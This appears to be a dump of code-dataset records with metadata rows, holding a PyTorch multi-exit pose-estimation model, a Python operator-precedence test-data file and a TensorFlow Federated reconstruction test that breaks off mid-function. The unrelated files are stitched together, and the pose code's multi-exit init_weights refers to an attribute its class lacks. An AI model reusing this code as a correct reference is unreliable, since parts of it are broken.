def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
assert num_layers == len(num_filters), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
assert num_layers == len(num_kernels), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
layers = []
for i in range(num_layers):
kernel, padding, output_padding = \
self._get_deconv_cfg(num_kernels[i], i)
planes = num_filters[i]
layers.append(
nn.ConvTranspose2d(
in_channels=self.inplanes,
out_channels=planes,
kernel_size=kernel,
stride=2,
padding=padding,
output_padding=output_padding,
bias=self.deconv_with_bias))
layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
layers.append(nn.ReLU(inplace=True))
self.inplanes = planes
return nn.Sequential(*layers)
def forward(self, input):
x, x_exit = self.backbone_s1(input)
x_exit = self.deconv_layers(x_exit)
x_exit = self.final_layer(x_exit)
return x_exit
def init_weights(self, pretrained=''):
# for k,v in self.state_dict().items():
# print(k)
if os.path.isfile(pretrained):
logger.info('=> init head deconv weights from normal distribution')
# for name, m in self.named_parameters():
# m.requires_grad = False
for name, m in self.deconv_layers.named_modules():
if isinstance(m, nn.ConvTranspose2d):
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init head final conv weights from normal distribution')
for m in self.final_layer.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
# for name, m in self.head_deconv_layers.named_parameters():
# m.requires_grad = True
# for name, m in self.head_final_layer.named_parameters():
# m.requires_grad = True
# pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(pretrained))
# self.load_state_dict(pretrained_state_dict, strict=False)
checkpoint = torch.load(pretrained)
dict_trained = checkpoint.copy()
dict_new = OrderedDict()
for k,v in self.state_dict().items():
if 'num_batches_tracked' not in k:
if 'backbone_s1.pre' in k:
dict_new[k] = dict_trained[k[16:]]
elif 'backbone_s1.exit' in k:
if len(self.backbone_s1.exit) == 1:
dict_new[k] = dict_trained['layer4.0.'+k[19:]]
elif len(self.backbone_s1.exit) == 2:
if 'exit.0' in k:
dict_new[k] = dict_trained['layer3.0.'+k[19:]]
elif 'exit.1' in k:
dict_new[k] = dict_trained['layer4.0.'+k[19:]]
elif len(self.backbone_s1.exit) == 3:
if 'exit.0' in k:
dict_new[k] = dict_trained['layer2.0.'+k[19:]]
elif 'exit.1' in k:
dict_new[k] = dict_trained['layer3.0.'+k[19:]]
elif 'exit.2' in k:
dict_new[k] = dict_trained['layer4.0.'+k[19:]]
elif 'deconv' in k or 'final' in k:
dict_new[k] = dict_trained[k]
else:
dict_new[k] = dict_trained[k[12:]]
# for k,v in dict_new.items():
# print(k)
# if isinstance(checkpoint, OrderedDict):
# state_dict = checkpoint
# elif isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
# state_dict_old = checkpoint['state_dict']
# state_dict = OrderedDict()
# # delete 'module.' because it is saved from DataParallel module
# for key in state_dict_old.keys():
# if key.startswith('module.'):
# # state_dict[key[7:]] = state_dict[key]
# # state_dict.pop(key)
# state_dict[key[7:]] = state_dict_old[key]
# else:
# state_dict[key] = state_dict_old[key]
# else:
# raise RuntimeError(
# 'No state_dict found in checkpoint file {}'.format(pretrained))
# freeze the backbone parameters
for k,v in self.named_parameters():
if 'backbone' in k and 'exit' not in k:
v.requires_grad=False
else:
v.requires_grad=True
self.load_state_dict(dict_new, strict=False)
else:
logger.error('=> imagenet pretrained model dose not exist')
logger.error('=> please download it first')
raise ValueError('imagenet pretrained model does not exist')
class PoseResNetwthMultiExit(nn.Module):
def __init__(self, block, layers, cfg, exit_list, **kwargs):
super(PoseResNetwthMultiExit, self).__init__()
extra = cfg.MODEL.EXTRA
self.deconv_with_bias = extra.DECONV_WITH_BIAS
self.ori_backbone = nn.ModuleList()
self.backbone = nn.ModuleList()
self.exit_list = exit_list
for i in range(len(exit_list)-1):
self.ori_backbone.append(get_pose_net_with_only_exit(cfg, is_train=True, start_point = self.exit_list[i]))
# state_dict = torch.load('/home/slzhang/projects/ETBA/Train/pose_estimation/checkpoints/split_point_{}/model_best.pth'.format(self.exit_list[i]))
# new_dict = OrderedDict()
# for k,v in self.ori_backbone[i].state_dict().items():
# new_dict[k] = state_dict['module.'+k]
# self.ori_backbone[i].load_state_dict(new_dict, strict=True)
self.ori_backbone.append(get_pose_net_with_only_exit(cfg, is_train=True, start_point = 33))
net_wth_finalhead = torch.load('/home/slzhang/projects/ETBA/Train/pose_estimation/checkpoints/pose_resnet_101_384x384.pth.tar')
new_dict = OrderedDict()
dict_finalhead = net_wth_finalhead.copy()
dict_finalhead_keys = list(net_wth_finalhead.keys())
i = 0
for k,v in self.ori_backbone[len(exit_list)-1].state_dict().items():
if 'num_batches_tracked' not in k:
new_dict[k] = dict_finalhead[dict_finalhead_keys[i]]
i = i + 1
self.ori_backbone[len(exit_list)-1].load_state_dict(new_dict, strict=True)
ori_backbone_copy = copy.deepcopy(self.ori_backbone)
for i in range(len(exit_list)):
if i == 0:
flatt_model = nn.Sequential(*list(ori_backbone_copy[i].backbone_s1.children())[:-1])
self.backbone.append(flatt_model)
else:
print('-------------------')
backbone = nn.Sequential()
last_bottleneck_num = 0
for layer in ori_backbone_copy[i-1].backbone_s1.named_modules():
if isinstance(layer[1], Bottleneck) and 'exit' not in layer[0]:
last_bottleneck_num = last_bottleneck_num + 1
cnt = 0
for layer in ori_backbone_copy[i].backbone_s1.named_modules():
if isinstance(layer[1], Bottleneck) and 'exit' not in layer[0]:
cnt = cnt + 1
if cnt > last_bottleneck_num:
backbone.add_module(layer[0].replace('.',' '), layer[1])
self.backbone.append(backbone)
for k,v in self.backbone[i].named_parameters():
v.requires_grad=True
for k,v in self.ori_backbone[i].named_parameters():
v.requires_grad=True
self.exit = nn.ModuleList()
self.deconv_layers = nn.ModuleList()
self.final_layer = nn.ModuleList()
for i in range(len(exit_list)):
self.exit.append(self.ori_backbone[i].backbone_s1.exit)
self.deconv_layers.append(self.ori_backbone[i].deconv_layers)
self.final_layer.append(self.ori_backbone[i].final_layer)
print(self.exit_list)
del(self.ori_backbone)
def _get_deconv_cfg(self, deconv_kernel, index):
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
output_padding = 1
elif deconv_kernel == 2:
padding = 0
output_padding = 0
return deconv_kernel, padding, output_padding
def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
assert num_layers == len(num_filters), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
assert num_layers == len(num_kernels), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
layers = []
for i in range(num_layers):
kernel, padding, output_padding = \
self._get_deconv_cfg(num_kernels[i], i)
planes = num_filters[i]
layers.append(
nn.ConvTranspose2d(
in_channels=self.inplanes,
out_channels=planes,
kernel_size=kernel,
stride=2,
padding=padding,
output_padding=output_padding,
bias=self.deconv_with_bias))
layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
layers.append(nn.ReLU(inplace=True))
self.inplanes = planes
return nn.Sequential(*layers)
def forward(self, x):
output = []
for i in range(len(self.exit_list)):
x = self.backbone[i](x)
x_exit = self.exit[i](x)
x_exit = self.deconv_layers[i](x_exit)
x_exit = self.final_layer[i](x_exit)
output.append(x_exit)
return output
def init_weights(self, pretrained=''):
# for k,v in self.state_dict().items():
# print(k)
if os.path.isfile(pretrained):
logger.info('=> init head deconv weights from normal distribution')
# for name, m in self.named_parameters():
# m.requires_grad = False
for name, m in self.deconv_layers.named_modules():
if isinstance(m, nn.ConvTranspose2d):
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init head final conv weights from normal distribution')
for m in self.final_layer.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
# for name, m in self.head_deconv_layers.named_parameters():
# m.requires_grad = True
# for name, m in self.head_final_layer.named_parameters():
# m.requires_grad = True
# pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(pretrained))
# self.load_state_dict(pretrained_state_dict, strict=False)
checkpoint = torch.load(pretrained)
dict_trained = checkpoint.copy()
dict_new = OrderedDict()
for k,v in self.state_dict().items():
if 'num_batches_tracked' not in k:
if 'backbone_s1.pre' in k:
dict_new[k] = dict_trained[k[16:]]
elif 'backbone_s1.exit' in k:
if len(self.backbone_s1.exit) == 1:
dict_new[k] = dict_trained['layer4.0.'+k[19:]]
elif len(self.backbone_s1.exit) == 2:
if 'exit.0' in k:
dict_new[k] = dict_trained['layer3.0.'+k[19:]]
elif 'exit.1' in k:
dict_new[k] = dict_trained['layer4.0.'+k[19:]]
elif len(self.backbone_s1.exit) == 3:
if 'exit.0' in k:
dict_new[k] = dict_trained['layer2.0.'+k[19:]]
elif 'exit.1' in k:
dict_new[k] = dict_trained['layer3.0.'+k[19:]]
elif 'exit.2' in k:
dict_new[k] = dict_trained['layer4.0.'+k[19:]]
elif 'deconv' in k or 'final' in k:
dict_new[k] = dict_trained[k]
else:
dict_new[k] = dict_trained[k[12:]]
# for k,v in dict_new.items():
# print(k)
# if isinstance(checkpoint, OrderedDict):
# state_dict = checkpoint
# elif isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
# state_dict_old = checkpoint['state_dict']
# state_dict = OrderedDict()
# # delete 'module.' because it is saved from DataParallel module
# for key in state_dict_old.keys():
# if key.startswith('module.'):
# # state_dict[key[7:]] = state_dict[key]
# # state_dict.pop(key)
# state_dict[key[7:]] = state_dict_old[key]
# else:
# state_dict[key] = state_dict_old[key]
# else:
# raise RuntimeError(
# 'No state_dict found in checkpoint file {}'.format(pretrained))
# freeze the backbone parameters
for k,v in self.named_parameters():
if 'backbone' in k and 'exit' not in k:
v.requires_grad=False
else:
v.requires_grad=True
self.load_state_dict(dict_new, strict=False)
else:
logger.error('=> imagenet pretrained model dose not exist')
logger.error('=> please download it first')
raise ValueError('imagenet pretrained model does not exist')
resnet_spec = {18: (BasicBlock, [2, 2, 2, 2]),
34: (BasicBlock, [3, 4, 6, 3]),
50: (Bottleneck, [3, 4, 6, 3]),
101: (Bottleneck, [3, 4, 23, 3]),
152: (Bottleneck, [3, 8, 36, 3])}
def get_pose_net(cfg, is_train, **kwargs):
num_layers = cfg.MODEL.EXTRA.NUM_LAYERS
style = cfg.MODEL.STYLE
block_class, layers = resnet_spec[num_layers]
if style == 'caffe':
block_class = Bottleneck_CAFFE
model = PoseResNet(block_class, layers, cfg, **kwargs)
if is_train and cfg.MODEL.INIT_WEIGHTS:
model.init_weights(cfg.MODEL.PRETRAINED)
# print("Model obtained!")
# model.eval()
# input = torch.rand(1, 3, 384, 384)
# output = model(input)
# input_names = ["input"]
# output_names = ["final_output"]
# torch.onnx.export(model, input,
# "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/posenet_s0.onnx",
# input_names=input_names, output_names=output_names,
# verbose=False,dynamic_axes={
# 'input': {0: 'batch_size'},
# 'final_output': {0: 'batch_size'},
# },opset_version=11)
return model
def get_pose_net_with_exit(cfg, is_train, start_point, **kwargs):
num_layers = cfg.MODEL.EXTRA.NUM_LAYERS
style = cfg.MODEL.STYLE
block_class, layers = resnet_spec[num_layers]
if style == 'caffe':
block_class = Bottleneck_CAFFE
model = PoseResNetwthExit(block_class, layers, cfg, start_point, **kwargs)
if is_train and cfg.MODEL.INIT_WEIGHTS:
pass
# model.init_weights(cfg.MODEL.PRETRAINED)
# model.init_weights(cfg.MODEL.PRETRAINED_WITH_HEAD)
print("Model obtained!")
# model.eval()
# input = torch.rand(1, 3, 384, 384)
# output = model(input)
# input_names = ["input"]
# output_names = ["final_output"]
# torch.onnx.export(model, input,
# "/home/slzhang/projects/ETBA/Train/human-pose-estimation.pytorch/posenet_with_exit.onnx",
# input_names=input_names, output_names=output_names,
# verbose=False,dynamic_axes={
# 'input': {0: 'batch_size'},
# 'final_output': {0: 'batch_size'},
# },opset_version=11)
return model
def get_pose_net_with_only_exit(cfg, is_train, start_point, **kwargs):
num_layers = cfg.MODEL.EXTRA.NUM_LAYERS
style = cfg.MODEL.STYLE
block_class, layers = resnet_spec[num_layers]
if style == 'caffe':
block_class = Bottleneck_CAFFE
model = PoseResNetwthOnlyExit(block_class, layers, cfg, start_point, **kwargs)
if is_train and cfg.MODEL.INIT_WEIGHTS:
# model.init_weights(cfg.MODEL.PRETRAINED)
model.init_weights(cfg.MODEL.PRETRAINED_WITH_HEAD)
print("Model obtained!")
return model
def get_pose_net_with_multi_exit(cfg, is_train, exit_list, **kwargs):
num_layers = cfg.MODEL.EXTRA.NUM_LAYERS
style = cfg.MODEL.STYLE
block_class, layers = resnet_spec[num_layers]
if style == 'caffe':
block_class = Bottleneck_CAFFE
model = PoseResNetwthMultiExit(block_class, layers, cfg, exit_list, **kwargs)
# for k,v in model.backbone[1].named_parameters():
# print(k)
# baseModel = torch.nn.Sequential(*(list(model.backbone[1].modules())[:-1]))
# for k,v in baseModel[0].named_parameters():
# print(k)
# if is_train and cfg.MODEL.INIT_WEIGHTS:
# # model.init_weights(cfg.MODEL.PRETRAINED)
# model.init_weights(cfg.MODEL.PRETRAINED_WITH_HEAD)
print("Model obtained!")
return model
def get_children(model: torch.nn.Module):
# get children form model!
children = list(model.children())
flatt_children = []
if children == []:
# if model has no children; model is last child! :O
return model
else:
# look for children from children... to the last child!
for child in children:
try:
flatt_children.extend(get_children(child))
except TypeError:
flatt_children.append(get_children(child))
return flatt_children
| 40.254359
| 158
| 0.55636
| 4,580
| 39,248
| 4.560917
| 0.062227
| 0.036191
| 0.021447
| 0.01034
| 0.854804
| 0.842022
| 0.834602
| 0.818421
| 0.801474
| 0.79324
| 0
| 0.02027
| 0.3338
| 39,248
| 975
| 159
| 40.254359
| 0.778636
| 0.180646
| 0
| 0.742636
| 0
| 0
| 0.087731
| 0.010411
| 0
| 0
| 0
| 0
| 0.012403
| 1
| 0.048062
| false
| 0.00155
| 0.017054
| 0
| 0.111628
| 0.009302
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c03469afc2dd59f2e02f81c3a1f5c6b4d48d4490
| 587
|
py
|
Python
|
python/testData/refactoring/inlinelocal/operatorPrecedence/booleanOr.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/inlinelocal/operatorPrecedence/booleanOr.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/refactoring/inlinelocal/operatorPrecedence/booleanOr.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
(10 or 2)[::-5]
(10 or 2)[5]
(10 or 2)(5)
(10 or 2).foo
-(10 or 2)
+(10 or 2)
~(10 or 2)
5 ** (10 or 2)
(10 or 2) ** 5
5 * (10 or 2)
(10 or 2) * 5
5 / (10 or 2)
(10 or 2) / 5
5 // (10 or 2)
(10 or 2) // 5
5 + (10 or 2)
(10 or 2) + 5
(10 or 2) - 5
5 - (10 or 2)
5 >> (10 or 2)
(10 or 2) << 5
5 & (10 or 2)
(10 or 2) & 5
5 ^ (10 or 2)
(10 or 2) ^ 5
5 | (10 or 2)
(10 or 2) | 5
() in (10 or 2)
(10 or 2) in ()
5 is (10 or 2)
(10 or 2) is 5
5 < (10 or 2)
(10 or 2) < 5
not (10 or 2)
5 and (10 or 2)
(10 or 2) and 5
5 or 10 or 2
10 or 2 or 5
10 or 2 if 10 or 2 else 10 or 2
| 10.12069
| 31
| 0.453152
| 166
| 587
| 1.60241
| 0.066265
| 0.616541
| 0.770677
| 0.383459
| 0.793233
| 0.793233
| 0.62406
| 0.62406
| 0.616541
| 0.567669
| 0
| 0.402089
| 0.34753
| 587
| 57
| 32
| 10.298246
| 0.292428
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
220cc37c9b12168840dc1016134d5e08c593eac5
| 37,140
|
py
|
Python
|
reconstruction/training_process_test.py
|
Abhin02/federated
|
5fd8f69284c2784b635faadfaf6c66ce843f7701
|
[
"Apache-2.0"
] | 1
|
2022-03-16T02:13:39.000Z
|
2022-03-16T02:13:39.000Z
|
reconstruction/training_process_test.py
|
notminusone/federated
|
6a709f5598450232b918c046cfeba849f479d5cb
|
[
"Apache-2.0"
] | null | null | null |
reconstruction/training_process_test.py
|
notminusone/federated
|
6a709f5598450232b918c046cfeba849f479d5cb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for training_process.py."""
import collections
import functools
import attr
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
import tensorflow_privacy as tfp
from reconstruction import keras_utils
from reconstruction import reconstruction_model
from reconstruction import reconstruction_utils
from reconstruction import training_process
def _create_input_spec():
return collections.OrderedDict(
x=tf.TensorSpec(shape=[None, 784], dtype=tf.float32),
y=tf.TensorSpec(dtype=tf.int32, shape=[None, 1]))
def global_recon_model_fn():
"""Keras MNIST model with no local variables."""
keras_model = tff.simulation.models.mnist.create_keras_model(
compile_model=False)
input_spec = _create_input_spec()
return keras_utils.from_keras_model(
keras_model=keras_model,
global_layers=keras_model.layers,
local_layers=[],
input_spec=input_spec)
def local_recon_model_fn():
"""Keras MNIST model with final dense layer local."""
keras_model = tff.simulation.models.mnist.create_keras_model(
compile_model=False)
input_spec = _create_input_spec()
return keras_utils.from_keras_model(
keras_model=keras_model,
global_layers=keras_model.layers[:-1],
local_layers=keras_model.layers[-1:],
input_spec=input_spec)
@attr.s(eq=False, frozen=True)
class MnistVariables(object):
"""Structure for variables in an MNIST model."""
weights = attr.ib()
bias = attr.ib()
class MnistModel(reconstruction_model.ReconstructionModel):
"""An implementation of an MNIST `ReconstructionModel` without Keras.
Applies a single dense layer followed by softmax. The weights of the dense
layer are global, and the biases are local.
"""
def __init__(self):
self._variables = MnistVariables(
weights=tf.Variable(
lambda: tf.zeros(dtype=tf.float32, shape=(784, 10)),
name='weights',
trainable=True),
bias=tf.Variable(
lambda: tf.zeros(dtype=tf.float32, shape=(10)),
name='bias',
trainable=True))
@property
def global_trainable_variables(self):
return [self._variables.weights]
@property
def global_non_trainable_variables(self):
return []
@property
def local_trainable_variables(self):
return [self._variables.bias]
@property
def local_non_trainable_variables(self):
return []
@property
def input_spec(self):
return collections.OrderedDict([('x', tf.TensorSpec([None, 784],
tf.float32)),
('y', tf.TensorSpec([None, 1], tf.int32))])
@tf.function
def forward_pass(self, batch, training=True):
del training
y = tf.nn.softmax(
tf.matmul(batch['x'], self._variables.weights) + self._variables.bias)
return reconstruction_model.BatchOutput(
predictions=y, labels=batch['y'], num_examples=tf.size(batch['y']))
def create_emnist_client_data():
rng = np.random.default_rng(42)
emnist_data = collections.OrderedDict([('x', [
rng.standard_normal(784).astype(np.float32),
rng.standard_normal(784).astype(np.float32),
rng.standard_normal(784).astype(np.float32)
]), ('y', [[5], [5], [9]])])
dataset = tf.data.Dataset.from_tensor_slices(emnist_data)
def client_data(batch_size=2):
return dataset.batch(batch_size)
return client_data
class _DPMean(tff.aggregators.UnweightedAggregationFactory):
def __init__(self, dp_sum_factory):
self._dp_sum = dp_sum_factory
self._clear_sum = tff.aggregators.SumFactory()
def create(self, value_type: tff.Type) -> tff.templates.AggregationProcess:
self._dp_sum_process = self._dp_sum.create(value_type)
@tff.federated_computation()
def init():
# Invoke here to instantiate anything we need
return self._dp_sum_process.initialize()
@tff.tf_computation(value_type, tf.int32)
def div(x, y):
# Opaque shape manipulations
return [tf.squeeze(tf.math.divide_no_nan(x, tf.cast(y, tf.float32)), 0)]
@tff.federated_computation(init.type_signature.result,
tff.type_at_clients(value_type))
def next_fn(state, value):
one_at_clients = tff.federated_value(1, tff.CLIENTS)
dp_sum = self._dp_sum_process.next(state, value)
summed_one = tff.federated_sum(one_at_clients)
return tff.templates.MeasuredProcessOutput(
state=dp_sum.state,
result=tff.federated_map(div, (dp_sum.result, summed_one)),
measurements=dp_sum.measurements)
return tff.templates.AggregationProcess(initialize_fn=init, next_fn=next_fn)
class TrainingProcessTest(tf.test.TestCase):
def _run_rounds(self, iterproc, federated_data, num_rounds):
train_outputs = []
initial_state = iterproc.initialize()
state = initial_state
for _ in range(num_rounds):
state, metrics = iterproc.next(state, federated_data)
train_outputs.append(metrics)
return state, train_outputs, initial_state
def test_build_train_iterative_process(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.1))
self.assertIsInstance(it_process, tff.templates.IterativeProcess)
federated_data_type = it_process.next.type_signature.parameter[1]
self.assertEqual(
str(federated_data_type), '{<x=float32[?,784],y=int32[?,1]>*}@CLIENTS')
def test_fed_recon_with_custom_client_weight_fn(self):
client_data = create_emnist_client_data()
federated_data = [client_data()]
def client_weight_fn(local_outputs):
return 1.0 / (1.0 + local_outputs['loss'][-1])
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=tf.keras.losses.SparseCategoricalCrossentropy,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001),
client_weight_fn=client_weight_fn)
_, train_outputs, _ = self._run_rounds(it_process, federated_data, 5)
self.assertLess(train_outputs[-1]['loss'], train_outputs[0]['loss'])
def test_server_update_with_inf_weight_is_noop(self):
client_data = create_emnist_client_data()
federated_data = [client_data()]
client_weight_fn = lambda x: np.inf
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=tf.keras.losses.SparseCategoricalCrossentropy,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001),
client_weight_fn=client_weight_fn)
state, _, initial_state = self._run_rounds(it_process, federated_data, 1)
self.assertAllClose(state.model.trainable, initial_state.model.trainable,
1e-8)
self.assertAllClose(state.model.trainable, initial_state.model.trainable,
1e-8)
def test_keras_global_model(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
it_process = training_process.build_federated_reconstruction_process(
global_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001))
server_state = it_process.initialize()
client_data = create_emnist_client_data()
federated_data = [client_data(), client_data()]
server_states = []
outputs = []
loss_list = []
for _ in range(5):
server_state, output = it_process.next(server_state, federated_data)
server_states.append(server_state)
outputs.append(output)
loss_list.append(output['loss'])
expected_keys = [
'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
]
self.assertCountEqual(outputs[0].keys(), expected_keys)
self.assertNotAllClose(server_states[0].model.trainable,
server_states[1].model.trainable)
self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
self.assertEqual(outputs[0]['num_examples'], 6)
self.assertEqual(outputs[1]['num_batches'], 4)
self.assertEqual(outputs[0]['num_examples'], 6)
self.assertEqual(outputs[1]['num_batches'], 4)
def test_keras_local_layer(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001))
server_state = it_process.initialize()
client_data = create_emnist_client_data()
federated_data = [client_data(), client_data()]
server_states = []
outputs = []
loss_list = []
for _ in range(5):
server_state, output = it_process.next(server_state, federated_data)
server_states.append(server_state)
outputs.append(output)
loss_list.append(output['loss'])
expected_keys = [
'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
]
self.assertCountEqual(outputs[0].keys(), expected_keys)
self.assertNotAllClose(server_states[0].model.trainable,
server_states[1].model.trainable)
self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
self.assertEqual(outputs[0]['num_examples'], 6)
self.assertEqual(outputs[1]['num_batches'], 4)
self.assertEqual(outputs[0]['num_examples'], 6)
self.assertEqual(outputs[1]['num_batches'], 4)
def test_keras_local_layer_metrics_empty_list(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return []
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001))
server_state = it_process.initialize()
client_data = create_emnist_client_data()
federated_data = [client_data(), client_data()]
server_states = []
outputs = []
loss_list = []
for _ in range(5):
server_state, output = it_process.next(server_state, federated_data)
server_states.append(server_state)
outputs.append(output)
loss_list.append(output['loss'])
expected_keys = ['loss']
self.assertCountEqual(outputs[0].keys(), expected_keys)
self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
self.assertNotAllClose(server_states[0].model.trainable,
server_states[1].model.trainable)
def test_keras_local_layer_metrics_none(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=None,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001))
server_state = it_process.initialize()
client_data = create_emnist_client_data()
federated_data = [client_data(), client_data()]
server_states = []
outputs = []
loss_list = []
for _ in range(5):
server_state, output = it_process.next(server_state, federated_data)
server_states.append(server_state)
outputs.append(output)
loss_list.append(output['loss'])
expected_keys = ['loss']
self.assertCountEqual(outputs[0].keys(), expected_keys)
self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
self.assertNotAllClose(server_states[0].model.trainable,
server_states[1].model.trainable)
def test_keras_joint_training(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001),
jointly_train_variables=True)
server_state = it_process.initialize()
client_data = create_emnist_client_data()
federated_data = [client_data(), client_data()]
server_states = []
outputs = []
loss_list = []
for _ in range(5):
